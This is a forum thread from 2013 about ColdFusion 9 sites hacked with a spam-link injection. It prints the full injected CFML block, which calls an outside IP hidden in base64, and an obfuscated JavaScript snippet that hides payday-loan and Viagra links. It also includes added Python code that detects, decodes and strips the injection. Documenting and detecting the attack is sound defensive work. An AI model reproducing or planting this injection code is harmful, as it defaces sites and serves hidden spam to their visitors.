NTS Forums
Welcome to the Newtek Technology Services Forum!

Author Topic: CF 9 Site hacked  (Read 10173 times)

wfinley (Jr. Member, Posts: 208, Karma: +1/-0, http://www.couloirgraphics.com)
CF 9 Site hacked
« on: February 07, 2013, 06:12:14 PM »
Just a heads up to everyone.  Today one of my CF sites was hacked.  More info on the hack here:
http://forums.adobe.com/message/5046548?tstart=0

The hack injected the following into the application.cfm file:

Code: [Select]
<!-- qweiop21 -->
<!--- Only act on ordinary visitors; the injection's own internal request below sends
      User-Agent "Archivver", which is the flag that stops it recursing --->
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)>
<!--- Re-request the page the visitor asked for and capture its normal output in "paga" --->
<cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<!--- Fetch the spam payload; the base64 literal decodes (via hSWaawe below) to http://199.19.94.194/cfset2.txt --->
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<!--- Splice the payload after the first </div>, </table> or </a>, otherwise just before </body> --->
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<!--- Send the modified copy and abort so the real page never renders --->
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<!--- base64 decoder used for the payload URL --->
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
<!-- qweiop22 -->
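Added example, not code from the post above or from the hosting provider: a Python scanner for the marked block, written for this page. It finds the `<!-- qweiop21 --> ... <!-- qweiop22 -->` span in a file, tells the CFML variant from the JavaScript one, decodes any base64 literal passed as a quoted argument (that is how the CFML variant hides its payload URL), records the User-Agent of the internal request, and can strip the block out. The sample Application.cfm is constructed; the base64 string in it is the one from the post.

```python
# Added example, not code from the post above or from the hosting provider: a scanner
# for the "<!-- qweiop21 --> ... <!-- qweiop22 -->" injection. It locates the marked
# block in a file, classifies it (CFML or JavaScript variant), decodes any base64
# literal passed as a quoted argument (the CFML variant hides its payload URL that
# way), records the User-Agent the self-request uses, and can strip the block out.
# SAMPLE_CFM is constructed for the example; the base64 string is the one posted.
import base64
import re
from pathlib import Path
from typing import Dict, List, Optional

MARKER_RE = re.compile(r"<!--\s*qweiop21\s*-->(.*?)<!--\s*qweiop22\s*-->", re.S | re.I)
# a base64 literal passed as a single-quoted argument, e.g. hSWaawe('aHR0...==')
B64_ARG_RE = re.compile(r"\(\s*'([A-Za-z0-9+/]{8,}={0,2})'\s*\)")
# User-Agent of the internal CFHTTP request (the injection's recursion guard)
UA_RE = re.compile(r'userAgent\s*=\s*"([^"]+)"', re.I)


def decode_b64_literal(literal: str) -> Optional[str]:
    """Decode a base64 literal to text; None if it is not valid base64 or not ASCII."""
    try:
        return base64.b64decode(literal, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(text: str) -> Optional[Dict]:
    """Describe the injected block in `text`, or return None if the markers are absent."""
    m = MARKER_RE.search(text)
    if m is None:
        return None
    body = m.group(1)
    lowered = body.lower()
    if "<cfhttp" in lowered:
        kind = "cfml"
    elif "<script" in lowered:
        kind = "javascript"
    else:
        kind = "unknown"
    urls = []
    for literal in B64_ARG_RE.findall(body):
        decoded = decode_b64_literal(literal)
        if decoded and decoded.lower().startswith(("http://", "https://")):
            urls.append(decoded)
    ua = UA_RE.search(body)
    return {
        "kind": kind,
        "offset": m.start(),
        "length": m.end() - m.start(),
        "payload_urls": urls,
        "proxy_user_agent": ua.group(1) if ua else None,
    }


def strip_injection(text: str) -> str:
    """Remove every marked block and leave the rest of the file untouched."""
    return MARKER_RE.sub("", text)


def scan_tree(root: Path, suffixes=(".cfm", ".cfc", ".php", ".html", ".htm")) -> List[Dict]:
    """Walk a web root and report every file that carries the markers."""
    hits: List[Dict] = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        info = analyse(text)
        if info:
            info["path"] = str(path)
            hits.append(info)
    return hits


# Constructed sample: a trimmed copy of the posted CFML injection inside an otherwise
# ordinary Application.cfm (the two cfset lines stand in for the real file's content).
SAMPLE_CFM = """<cfset this.name = "mysite">
<!-- qweiop21 -->
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>#mmy#</cfoutput></cfsavecontent>
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
<cfoutput>#paga#</cfoutput><cfabort>
</cfif>
<cffunction name="hSWaawe"><cfargument name="HxzcGlk"><cfreturn ToString(ToBinary(HxzcGlk))></cffunction>
<!-- qweiop22 -->
<cfset request.dsn = "mysite">
"""

if __name__ == "__main__":
    print(analyse(SAMPLE_CFM))
    print(strip_injection(SAMPLE_CFM))
```

Run `scan_tree(Path("/var/www"))` over the web root to list affected files and the payload host each one pulls from. Stripping the block only removes the symptom; the repeat infections reported later in this thread show the entry point has to be closed as well.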




morovan (Hero Member, Posts: 1,052, Karma: +54/-2)
Re: CF 9 Site hacked
« Reply #1 on: February 08, 2013, 08:50:01 AM »
It amazes me the lengths these guys will go through to sell Viagra...
www.todayrealestate.com - Search the MLS for all properties for sale on Cape Cod, Massachusetts.

morovan (Hero Member, Posts: 1,052, Karma: +54/-2)
Re: CF 9 Site hacked
« Reply #2 on: February 08, 2013, 08:52:04 AM »
By the way, the link they are using in the cfhttp call is still active.

Here's a link to the WHOIS for the IP address if you want to try and report them.

http://whois.arin.net/rest/net/NET-199-19-92-0-1/pft

wfinley (Jr. Member, Posts: 208, Karma: +1/-0, http://www.couloirgraphics.com)
Re: CF 9 Site hacked
« Reply #3 on: February 08, 2013, 12:38:15 PM »
Thanks.  Hoping support will do something... submitted the ticket 24 hours ago and still no response.  Not that I expect anything from these guys these days.  Maybe it's time to finally migrate my personal sites as well away from here.

drumWatts (Hosting Newbie, Posts: 5, Karma: +0/-0)
Re: CF 9 Site hacked
« Reply #4 on: February 15, 2013, 01:18:39 AM »
I had one site hacked last week and another this morning - both exactly as described on the Adobe link above. The one last week actually has been hit three times. Each time I deleted the offending code but within a day or two it was back.

FYI, both sites had an index.php hacked - not a CF page.

I sent a ticket to support. Hopefully they'll be on it.

To clarify - both index.php pages had this code snippet inserted:

Code: [Select]
<!-- qweiop21 -->
<script language="JavaScript">function zdrViewState()
{
// each array entry is a run of two-digit numbers; the loop below turns them back into characters
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}
// decodes to a <style> rule that positions the .zdroq class off-screen; x[4] is past the end of the four-element array
document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>



<p class="zdroq">
You would usually agree <a href="http://payday-go.co.uk/" title="Payday Loans">payday loans</a> on the payment dates as stated in your agreement contract. This could confuse <a href="http://www.payday-uk-online.co.uk/" title="Payday Loans Online">payday loans online</a> the payday lender. Another <a href="http://for-sale-viagra-uk.co.uk/" title="Viagra Dosage">viagra dosage</a> common requirement for you to get a loan is to have a job. </p><!-- qweiop22 -->

« Last Edit: February 15, 2013, 01:21:33 AM by drumWatts »
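Added example, not code from the post above: a Python decoder for the obfuscated zdrViewState() snippet, so the CSS it writes can be read without loading the page in a browser. Each array entry is a run of two-digit numbers; the original loop rebuilds x[l-a] for a = 1..l by adding (25 - l + a) to every pair and then document.write()s the result as a style element. The functions below re-implement that loop and pull the links out of the hidden paragraph. SAMPLE_JS and SAMPLE_HTML are constructed from the posted snippet.

```python
# Added example, not code from the post above: decode the obfuscated zdrViewState()
# snippet without loading it in a browser. Each array entry is a run of two-digit
# numbers; the original loop rebuilds x[l-a] for a = 1..l by adding (25 - l + a) to
# every pair, then document.write()s the result as a <style> element. The functions
# below re-implement that loop in Python and pull the hidden paragraph's links out
# of the surrounding HTML. SAMPLE_JS and SAMPLE_HTML are constructed from the posted
# snippet.
import re
from typing import List

ARRAY_RE = re.compile(r"new Array\((.*?)\)", re.S)
ITEM_RE = re.compile(r"'(\d+)'")
HREF_RE = re.compile(r'href="([^"]+)"', re.I)


def extract_array(js: str) -> List[str]:
    """Return the string items of the first `new Array('..','..')` literal in the script."""
    m = ARRAY_RE.search(js)
    if m is None:
        raise ValueError("no new Array(...) literal found")
    return ITEM_RE.findall(m.group(1))


def decode_packed(numbers: List[str]) -> List[str]:
    """Mirror the snippet's loop: decode x[l-a] for a = 1..l with shift 25 - l + a."""
    l = len(numbers)
    out = list(numbers)
    for a in range(1, l + 1):
        m = out[l - a]
        shift = 25 - l + a
        # pairs of digits -> characters; a trailing odd digit is dropped, as in the original
        out[l - a] = "".join(chr(int(m[i:i + 2]) + shift) for i in range(0, len(m) - len(m) % 2, 2))
    return out


def rendered_markup(decoded: List[str]) -> str:
    """Rebuild what document.write() emits: '<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>'.
    x[4] is out of range for the four-element array, so JavaScript inserts the string
    "undefined"; that is reproduced here rather than hidden."""
    def item(i: int) -> str:
        return decoded[i] if i < len(decoded) else "undefined"
    return f"<{item(0)} {item(4)}>.{item(2)}{{{item(1)}}}</{item(0)}>"


def hidden_paragraph_links(html: str, css_class: str) -> List[str]:
    """Return the href targets inside the first <p class="css_class"> ... </p>."""
    pattern = rf'<p\s+class="{re.escape(css_class)}"\s*>(.*?)</p>'
    m = re.search(pattern, html, re.S | re.I)
    return HREF_RE.findall(m.group(1)) if m else []


def deobfuscate(js: str) -> dict:
    """Decoded array items, the markup the script would write, and the class it hides."""
    decoded = decode_packed(extract_array(js))
    return {"decoded": decoded, "markup": rendered_markup(decoded), "css_class": decoded[2]}


# Constructed sample: the script from the post, followed by the hidden paragraph it styles.
SAMPLE_JS = """<script language="JavaScript">function zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>"""

SAMPLE_HTML = SAMPLE_JS + """
<p class="zdroq">
You would usually agree <a href="http://payday-go.co.uk/" title="Payday Loans">payday loans</a> on the payment dates as stated in your agreement contract. This could confuse <a href="http://www.payday-uk-online.co.uk/" title="Payday Loans Online">payday loans online</a> the payday lender. Another <a href="http://for-sale-viagra-uk.co.uk/" title="Viagra Dosage">viagra dosage</a> common requirement for you to get a loan is to have a job. </p>"""

if __name__ == "__main__":
    result = deobfuscate(SAMPLE_JS)
    print(result["markup"])
    print(hidden_paragraph_links(SAMPLE_HTML, result["css_class"]))
```

The decoded rule moves the `.zdroq` paragraph 9999px above the viewport, so visitors never see the payday-loan and Viagra links while crawlers still index them; that is the whole point of the injection, and the link targets are the indicators worth blocking or reporting.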

jamesedmunds (Full Member, Posts: 680, Karma: +21/-0, http://jamesedmunds.com/poorclio)
Re: CF 9 Site hacked
« Reply #5 on: February 20, 2013, 03:02:49 AM »
Any update on this topic?

Thanks,

James
James Edmunds
New Iberia, LA

wfinley (Jr. Member, Posts: 208, Karma: +1/-0, http://www.couloirgraphics.com)
Re: CF 9 Site hacked
« Reply #6 on: September 01, 2013, 03:17:47 PM »
The update is that CT applied the hotfix to the server that got hacked but apparently didn't update all the servers since yet another server got hacked today.  If you have CF9 sites I'd email support and request they apply the hotfix.

https://www.adobe.com/support/security/bulletins/apsb13-13.html

tagfire (Hosting Newbie, Posts: 43, Karma: +2/-2)
Re: CF 9 Site hacked
« Reply #7 on: October 11, 2013, 02:04:36 AM »
This is still happening.  One of my clients' sites has been hit several times.

When I email support, they remove the offending code but don't seem to do anything about securing the server.

I believe the problem is that once a vulnerable server has been identified, a 'backdoor' of sorts is added which allows the attacker to continue defacing sites even after the hotfix has been applied.  There's a thread on the Adobe forums that discusses this:
http://forums.adobe.com/message/5047474#5047474

Until the server's vulnerabilities are properly addressed, our sites will continue to be defaced.